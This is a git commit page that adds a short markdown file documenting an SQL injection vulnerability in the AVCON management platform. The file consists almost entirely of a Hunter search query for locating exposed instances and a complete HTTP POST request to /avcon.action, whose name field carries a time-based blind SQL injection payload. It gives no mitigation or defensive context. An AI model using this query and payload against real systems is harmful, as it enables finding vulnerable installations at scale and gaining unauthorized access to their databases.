Create avcon综合管理平台SQL注入漏洞.md
This commit is contained in:
parent
ba4fcd6c00
commit
de2d0d47bf
24
avcon综合管理平台SQL注入漏洞.md
Normal file
24
avcon综合管理平台SQL注入漏洞.md
Normal file
@ -0,0 +1,24 @@
|
||||
## avcon综合管理平台SQL注入漏洞
|
||||
|
||||
|
||||
## hunter
|
||||
```
|
||||
web.title="AVCON-系统管理平台"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /avcon.action HTTP/1.1
|
||||
Host:
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 77
|
||||
|
||||
name=0'XOR(if(now()=sysdate()%2Csleep(7)%2C0))XOR'Z&password=u]H[ww6KrA9F.x-F
|
||||
```
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user